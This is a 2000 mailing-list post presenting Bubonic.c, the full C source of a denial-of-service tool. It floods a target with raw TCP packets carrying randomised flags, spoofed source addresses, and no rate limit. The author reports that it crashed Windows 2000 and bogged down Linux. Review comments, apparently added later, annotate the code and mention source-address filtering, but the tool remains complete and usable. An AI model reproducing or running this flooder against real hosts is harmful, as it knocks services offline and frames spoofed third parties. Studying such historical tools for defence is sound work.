
Win2k & Linux DoS


From: "J. Oquendo" <intrusion () ENGINEER COM>
Date: Fri, 25 Aug 2000 11:50:24 -0400

Greetings everyone. While tampering with random codes when building a theoretical tool I managed to crash my 
Windows2000 laptop by randomizing TCP settings. At first it wasn't a big deal since MS has gotten me used to seeing 
error codes with dumps for just about anything.

Seems this code, which was in no way specified to attack any specific OS, brings the load up to extreme levels and is not
limited to Win2K either.

Written on an Ultra5 running Linux (zoot), I managed to drive this load up high after about 3 minutes, forcing the
machine to lag drastically.

So in essence I give to you Bubonic.c; maybe someone else can benchmark it and figure out what's going on.

Error code received during the WinCrash was:

STOP 0x00000041
(0x00001000,0x00001279,0x0000042a,0x00000001)
MUST_SUCCEED_POOL_EMPTY

-------- SNIP TO CODE --------

/*

 * Bubonic.c lame DoS against Windows 2000 machines
 * and certain versions of Linux (worked against an Ultra5
 * running Redhat Zoot. Should compile under anything.
 * Randomly sends TCP packets with random settings, etc.

 * Brings the load up causing the box to crash with
 * error code:

 * STOP 0x00000041 (0x00001000,0x00001279,0x000042A,0x00000001)
 * MUST_SUCCEED_POOL_EMPTY

 * CODE RIPPED FROM MY OTHER BGP KILLER WITH SETTINGS TWEAKED.
 * WEE MULTICODE... www.antioffline.com/daemonic.c

 * shouts... hrmm fsck it why not...
 * #unixgods on the efnet, jhh, iggie, rajak, speye, obecian,
 * qwer7y, m3th, god-, tattooman, spikeman, and my wife.
 * Can't forget security staff all over the place.

 * Logs for the packets sent at www.antioffline.com/logged
 * Windows2K screen shots at www.antioffline.com/loads.html
 */


#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <strings.h>
#include <sys/time.h>
#include <sys/types.h>
#include <sys/socket.h>

#ifndef __USE_BSD
#define __USE_BSD

#endif

#ifndef __FAVOR_BSD

#define __FAVOR_BSD

#endif

#include <netinet/in_systm.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/tcp.h>
#include <arpa/inet.h>
#include <netdb.h>

#ifdef LINUX
#define FIX(x)  htons(x)

#else

#define FIX(x)  (x)
#endif

/* Local copy of the IPv4 header layout. Not referenced by the rest of this
 * file: `struct packet` below is built on the system `struct ip` instead.
 * NOTE(review): saddr/daddr are u_long, which is 8 bytes on LP64 platforms
 * while the wire field is 4, so sizeof this struct only matches a real
 * IPv4 header where long is 32 bits. */
struct ip_hdr {
    u_int       ip_hl:4,        /* header length, in 32-bit words */
                ip_v:4;         /* version */
    u_char      ip_tos;         /* type of service */
    u_short     ip_len;         /* total length */
    u_short     ip_id;          /* identification */
    u_short     ip_off;         /* flags + fragment offset */
    u_char      ip_ttl;         /* time to live */
    u_char      ip_p;           /* protocol */
    u_short     ip_sum;         /* header checksum */
    u_long      saddr, daddr;   /* source / destination address */
};

/* Local copy of the TCP header layout; also unused here, since `struct
 * packet` carries the system `struct tcphdr`. `th_syn` occupies the slot
 * where the standard header has the acknowledgement number.
 * NOTE(review): th_seq/th_syn are u_long (8 bytes on LP64), so this does
 * not match the 20-byte wire header on such platforms. */
struct tcp_hdr {
    u_short     th_sport;       /* source port */
    u_short     th_dport;       /* destination port */
    u_long      th_seq;         /* sequence number */
    u_long      th_syn;         /* acknowledgement-number position */
    u_int       th_x2:4,        /* reserved */
                th_off:4;       /* data offset, in 32-bit words */
    u_char      th_flags;
    u_short     th_win;         /* window */
    u_short     th_sum;         /* checksum */
    u_short     th_urp;         /* urgent pointer */
};

/* TCP option with a 16-bit value (type, length, value). Declared but not
 * referenced anywhere in this file. */
struct tcpopt_hdr {
    u_char  type;
    u_char  len;
    u_short value;
};

/* Pseudo-header placed in front of the TCP header for checksumming (see
 * `struct cksum` and flooder()). mbz: must be zero; ptcl: protocol number;
 * tcpl: TCP segment length field.
 * NOTE(review): saddr/daddr are u_long, i.e. 8 bytes on LP64, whereas the
 * standard pseudo-header uses 4-byte addresses; flooder() checksums
 * sizeof(cksum), so the struct width matters on such platforms. */
struct pseudo_hdr {
    u_long saddr, daddr;
    u_char mbz, ptcl;
    u_short tcpl;
};

/* Buffer written to the wire: the system IPv4 header followed by the system
 * TCP header (BSD-style th_* field names selected by __FAVOR_BSD above).
 * flooder() stores sizeof(packet) in ip_len and passes the whole struct to
 * sendto(). */
struct packet {
    struct ip/*_hdr*/ ip;
    struct tcphdr tcp;
};

/* Scratch layout for the TCP checksum: pseudo-header followed by a copy of
 * the TCP header; flooder() runs in_cksum() over the entire struct. */
struct cksum {
    struct pseudo_hdr pseudo;
    struct tcphdr tcp;
};

/* File-scope state shared between main() and flooder(). */
struct packet packet;       /* the single header buffer reused for every sendto() in flooder() */
struct cksum cksum;         /* scratch area for the TCP checksum */
struct sockaddr_in s_in;    /* sockaddr handed to sendto(); filled in flooder() */
u_short bgport, bgsize, pps;/* bgport/bgsize come from argv[3]/argv[4] in main(); bgsize and pps are never read in this file */
u_long radd;                /* argv[1] resolved by lookup(); used as ip_dst */
u_long sradd;               /* argv[2] resolved by lookup(); used as ip_src */
int sock;                   /* raw IPv4 socket opened in main() */

/* Print the command-line synopsis to stderr and terminate with status 1.
 * progname: argv[0], echoed in the first line. Never returns. */
void usage(char *progname)
{
    static const char *const help[] = {
        "Ports are set to send and receive on port 179\n",
        "dst:\tDestination Address\n",
        "src:\tSource Address\n",
        "size:\tSize of packet which should be no larger than 1024 should allow for xtra header info thru routes\n",
        "num:\tpackets\n\n",
    };
    size_t k;

    fprintf(stderr, "Usage: %s <dst> <src> <size> <number>\n", progname);
    for (k = 0; k < sizeof help / sizeof help[0]; ++k) {
        fputs(help[k], stderr);
    }
    exit(1);
}

/* Internet checksum (RFC 1071 style) over `len` bytes starting at `addr`:
 * sum the buffer as 16-bit words, fold the carries back into 16 bits and
 * return the one's complement. A trailing odd byte is treated as the first
 * (low-address) byte of a zero-padded 16-bit word. Used for both the IP
 * header checksum and the TCP pseudo-header checksum in flooder(). */
inline u_short in_cksum(u_short *addr, int len)
{
    int acc = 0;
    u_short odd = 0;
    const u_short *cur = addr;
    int remaining;

    /* main pass: whole 16-bit words */
    for (remaining = len; remaining > 1; remaining -= 2) {
        acc += *cur++;
    }

    /* one dangling byte: put it in the first byte of `odd`, the other stays 0 */
    if (remaining == 1) {
        *(unsigned char *)&odd = *(const unsigned char *)cur;
        acc += odd;
    }

    /* fold 32 -> 16 bits; the second add absorbs a carry from the first fold */
    acc = (acc >> 16) + (acc & 0xffff);
    acc += acc >> 16;

    return (u_short)~acc;
}

/* Resolve `hostname` with gethostbyname() and return its first address as
 * read through a u_long pointer. Exits with status 1 when resolution fails.
 * NOTE(review): hp->h_addr points at a 4-byte IPv4 address, but u_long is
 * 8 bytes on LP64 platforms, so this dereference reads past the address on
 * such systems — confirm target platforms before relying on the value. */
u_long lookup(char *hostname)
{
    struct hostent *hp;

    if ((hp = gethostbyname(hostname)) == NULL) {
       fprintf(stderr, "Could not resolve %s fucknut\n", hostname);
       exit(1);
    }

    return *(u_long *)hp->h_addr;
}


/* Transmit loop: fills the global `packet` with an IPv4 header addressed to
 * radd and carrying sradd as its source, plus a TCP header whose flags, ack,
 * ports and sequence are redrawn from rand()/random() on each iteration, and
 * sends it through the raw socket `sock`. There is no exit condition and no
 * pacing, so it runs until the process is killed. Because ip_src is a
 * caller-chosen address rather than the host's own, source-address
 * validation on the sending network (BCP 38 style filtering) is the control
 * that stops this traffic from leaving. */
void flooder(void)
{
    struct timespec ts;     /* assigned below but never used; nothing in the loop sleeps */
    int i;


    /* memset() is declared in <string.h>, which this file does not include
     * (only <strings.h>) — presumably relies on an implicit or transitive
     * declaration; verify on the target toolchain. */
    memset(&packet, 0, sizeof(packet));

    ts.tv_sec                   = 0;
    ts.tv_nsec                  = 10;

    /* fixed IPv4 header fields; ip_src and the checksum are set inside the loop */
    packet.ip.ip_hl             = 5;
    packet.ip.ip_v              = 4;
    packet.ip.ip_p              = IPPROTO_TCP;
    packet.ip.ip_tos            = rand();
    packet.ip.ip_id             = radd;                 /* truncated to 16 bits */
    packet.ip.ip_len            = FIX(sizeof(packet));  /* FIX() is htons() only when LINUX is defined */
    packet.ip.ip_off            = 0;
    packet.ip.ip_ttl            = 255;
    packet.ip.ip_dst.s_addr     = radd;

    /* initial TCP fields; random() is never seeded here or in main() (only srand() is called) */
    packet.tcp.th_flags         = random();
    packet.tcp.th_win           = 65535;
    packet.tcp.th_seq           = random();
    packet.tcp.th_ack           = 0;
    packet.tcp.th_off           = 0;
    packet.tcp.th_urp           = random();
    packet.tcp.th_dport         = random();
    /* pseudo-header for the TCP checksum; saddr is filled inside the loop */
    cksum.pseudo.daddr          = sradd;
    cksum.pseudo.mbz            = 0;
    cksum.pseudo.ptcl           = IPPROTO_TCP;
    cksum.pseudo.tcpl           = random();

    /* sockaddr handed to sendto(); note it carries sradd, while the IP header's ip_dst carries radd */
    s_in.sin_family             = AF_INET;
    s_in.sin_addr.s_addr        = sradd;
    s_in.sin_port               = packet.tcp.th_dport;

    for(i=0;;++i) {
    /* every 1024th iteration (i & 0x3FF == 0): new source port and (re)write
     * ip_src / pseudo saddr; otherwise only flags and ack change */
    if( !(i&0x3FF) ) {
        packet.tcp.th_sport = rand();
        cksum.pseudo.saddr = packet.ip.ip_src.s_addr = sradd;
        packet.tcp.th_flags = random();
        packet.tcp.th_ack   = rand();

    }
    else {
        packet.tcp.th_flags = rand();
        packet.tcp.th_ack = rand();
    }
       ++packet.ip.ip_id;
       /*++packet.tcp.th_sport*/;
       ++packet.tcp.th_seq;

       /* bgport == 0 (argv[3]): fresh destination port per packet;
        * otherwise th_dport keeps the random() value chosen above */
       if (!bgport)
          s_in.sin_port = packet.tcp.th_dport = rand();

       /* zero both checksum fields before computing them */
       packet.ip.ip_sum         = 0;
       packet.tcp.th_sum        = 0;

       cksum.tcp                = packet.tcp;

       packet.ip.ip_sum         = in_cksum((void *)&packet.ip, 20);              /* 20-byte IP header */
       packet.tcp.th_sum        = in_cksum((void *)&cksum, sizeof(cksum));       /* pseudo-header + TCP header copy */

       /* the trailing ';' makes this an empty if: sendto() failures are silently ignored */
       if (sendto(sock, &packet, sizeof(packet), 0, (struct sockaddr *)&s_in, sizeof(s_in)) < 0);

    }
}

/* Entry point: open a raw IPv4 socket (needs raw-socket privilege, e.g. root
 * or CAP_NET_RAW on Linux), drop to the real uid/gid, check the argument
 * count, enable IP_HDRINCL, seed rand(), resolve both hosts and hand over to
 * flooder(), which never returns. The final `return 0` is therefore not
 * reached in normal operation. */
int main(int argc, char *argv[])
{
    int on = 1;     /* value for IP_HDRINCL: the process supplies its own IP header */

    printf("Bubonic -- sil () antioffline com\n\n");

    if ((sock = socket(PF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) {
       perror("socket");
       exit(1);
    }

    /* drop privileges now that the raw socket exists; return values are unchecked */
    setgid(getgid()); setuid(getuid());

    /* NOTE(review): argc < 4 still admits argc == 4, yet argv[4] is read
     * below; argv[argc] is the terminating NULL, so atoi(NULL) would be
     * reached — usage() documents four positional arguments */
    if (argc < 4)
       usage(argv[0]);

    if (setsockopt(sock, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on)) < 0)

{
       perror("setsockopt");
       exit(1);

    }

    /* seeds rand() only; random(), as used in flooder(), is left unseeded.
     * time() is called without a <time.h> include — presumably an implicit
     * or transitive declaration; confirm on the target toolchain */
    srand((time(NULL) ^ getpid()) + getppid());

    printf("\nFinding host\n"); fflush(stdout);

    /* argv[3]/argv[4] are labelled <size>/<number> in usage() but are stored
     * as bgport/bgsize; bgsize is not read anywhere in this file */
    radd        = lookup(argv[1]);
    bgport      = atoi(argv[3]);
    bgsize      = atoi(argv[4]);
    sradd       = lookup(argv[2]);
    printf("AntiOffline -- Putting the Hero in Heroin\n");

    flooder();  /* does not return */

    return 0;
}

______________________________________________
FREE Personalized Email at Mail.com
Sign up at http://www.mail.com/?sr=signup


